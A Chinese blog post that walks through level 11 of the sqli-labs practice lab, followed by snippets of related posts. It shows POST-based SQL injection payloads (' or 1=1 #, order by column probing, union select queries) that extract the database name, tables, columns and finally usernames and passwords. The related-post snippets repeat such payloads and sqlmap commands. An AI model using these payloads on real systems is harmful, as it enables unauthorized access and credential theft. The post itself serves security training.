sql注入第11关

空白行

已于 2022-04-15 15:43:22 修改

阅读量4k

点赞数 2

分类专栏： OWASP 文章标签： sql 数据库 web安全

于 2022-03-14 17:55:26 首次发布

本文链接：https://blog.csdn.net/qq_45751902/article/details/123481617

版权

OWASP 专栏收录该内容

12 篇文章 2 订阅

订阅专栏

这关采用post的方式传参

定闭合符
使用’ or 1=1 # 回显正常
在这里插入图片描述

使用" or 1=1 #，回显报错（可以尝试更多的闭合符，这里就不一一实现了）
在这里插入图片描述
实现原理

在这里插入图片描述
查询列数
admin’ order by 2 #

’ order by 3 #
在这里插入图片描述
所以有两列

找显示位
在这里插入图片描述
查数据库名

'union select 1,database()#

在这里插入图片描述
查表名

' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

在这里插入图片描述
查列名

' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
查列值

' union select 1,group_concat(username,0x3a,password) from users#

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

空白行

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

通过sql-labs进行sql注入学习(11-22)

Lemon's blog

10-27

478

前言：SQL注入还是不够精通，继续训练！第十一关尝试万能密码' or 1=1#,有回显，看来是单引号闭合，抓包进行操作，还是回显注入，不过是从GET方式变成了POST方式 payload: 判断列数 uname=' order by 1,2,3# 查找数据库 uname=' union select 1,database()# 查表 uname=' union select 1,group_...

【sqli-labs靶场】第11关

qq_61019688的博客

04-26

861

知道了sql语句，接下来就是构造sql语句来进行查询，例如1’ or 1=1#（注意此处不能再使用and来构造恒真语句，因为我们不知道username和password，所以要想判断sql语句是否执行要使用or，这样or后面的语句为true则执行，为false则报错）（还有一个注意点的此处不能再用--+来注释，要使用#）1’ order by 2#，无返回内容，由此可以判断出列数应该是2，对于为啥order by 2无内容返回因为是可能不存在username=1，所以查不到内容。1’ or 1=2#报错。

参与评论您还未登录，请先登录后发表或查看评论

bwapp---sql注入第十一关过关过程及分析

weixin_45821250的博客

12-07

303

报错没爆出来，但是插入的方式解决了。SQL Injection - Stored (Blog)

表单注入——sqli-labs第11~16关

这是笔者初学时所做的笔记，有错误的地方太多了，有些结论也只是笔者的一家之言。请自行判断

07-28

1800

1、观察是post还是get 可以看url的变化，或者看源码 xxxx’ order by 10# ’ order by 2#

SQL 联合注入（injection 第一关）

最新发布

baishiqi12的博客

08-14

624

仅供参考

POST注入-SQL-labs(11关)

weixin_51706044的博客

05-09

539

文章目录一、万能密码二、判断闭合符号三、查询列数四、找显示位一、万能密码对于万能密码的类型是根据SQL注入的情况而判断的，这里举例几个SQL注入中常见的几个类型： 1.xxx’ or 1 = 1#(最后的#可以换成-- (记住如果是-- 的最后有个空格)) 【这种是比较通用的】 2.xxx’ or ‘1’ = ‘1(最后可以加#或者加-- (记住如果是-- 的最后有个空格)) 3.xxx” or “1” = “1 4.xxx”) or (“1”) = (“1 其实对于表单注入：在用户名密码框当

利用SQLmap实现 SQL 注入

m0_71805735的博客

06-21

2475

利用SQLmap实现 SQL 注入

第十一节 HTTP头中的SQL注入-01

09-15

Sqlmap是一款强大的自动化SQL注入工具，它可以检测和利用SQL注入漏洞。以下是一些使用Sqlmap进行测试的例子： - **自动搜索POST表单注入**：`sqlmap.py -u "http://ip/sqltest/post.php" --forms` 这条命令会检测...

第十九节宽字节SQL注入-01

09-15

宽字节SQL注入是一种特殊类型的SQL注入攻击，主要针对使用宽字节字符集（如GBK、UTF-16等）的数据库管理系统。宽字节SQL注入攻击的关键在于exploit宽字节字符集的特性来 bypass 数据库的安全机制。宽字节字符集 ...

第十三节 SQL注入绕过技术-01

09-15

在 Web 应用程序中，SQL 注入攻击是最常见的安全漏洞之一。攻击者可以通过注入恶意 SQL 代码来访问或修改敏感数据。为了防止 SQL 注入攻击，开发者通常会对用户输入进行过滤和校验。但是，攻击者总是可以找到 ways ...

SQL注入详解 23-28关

君莫hacker的博客

10-08

829

目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca

sql注入11-20题

Camillewuxie的博客

02-08

285

Less 11-20题 11关先输入1‘or 1=1–+发现为单引号闭合登录成功单引号闭合。 2.？id=-1’ order by 3–+ 找有多少个字段。输入2时页面正常，所以字段数是2个；然后用联合注入，具体如下：（1）.爆数据库名？id=-1’ union select 1,（select database()），3–+ (2).爆表名 ?id=-1’ union selec...

sqli-labs关卡11(基于post提交的单引号闭合的字符型注入)通关思路

zyh1588的博客

11-06

655

小白回顾sqli-labs靶场第十一关

基于Sql-Labs靶场的SQL注入-11~16关

Joker

12-31

797

这里我讲述了POST提交方式的注入方法，用到的注入类型为联合注入、报错注入、布尔盲注三种。

SQL注入详解 11-22关

君莫hacker的博客

09-28

1053

目录Less-11（POST传参，联合注入）Less-12（floor报错注入）Less-13（updatexml()报错注入）Less-14 Less-11（POST传参，联合注入）第11关总结：第十一关与前面的关卡不太相同，这里采用了POST传参，我们需要借助浏览器插件或者抓包工具对其参数进行修改。用户名与密码均为admin，登录成功后会回显出用户名及密码，所以我们可以尝试在参数uname与参数passwd处尝试进行注入，经过判断，发现在参数uname处存在单引号字符型注入，并且有回显能判断出字段

sqli-labs lesson 11-15 通关解析学习sql注入

weixin_44286136的博客

05-19

354

lesson 11

sql注入11、17、24关

m0_62903168的博客

08-05

329

查看源码后发现注入点。在User Name输入框中输入注入语句，注意由于这次传参是用的POST，不会进行url编码，所以注释符不能使用--+，换成#就行。注入语句：aaa' union select 1,database()#

sqli-labs基础篇第11~17关

Lucky小小吴的小屋

01-23

1464

sqli-labs基础篇第11~17关

SQLi LABS Less-12 联合注入+报错注入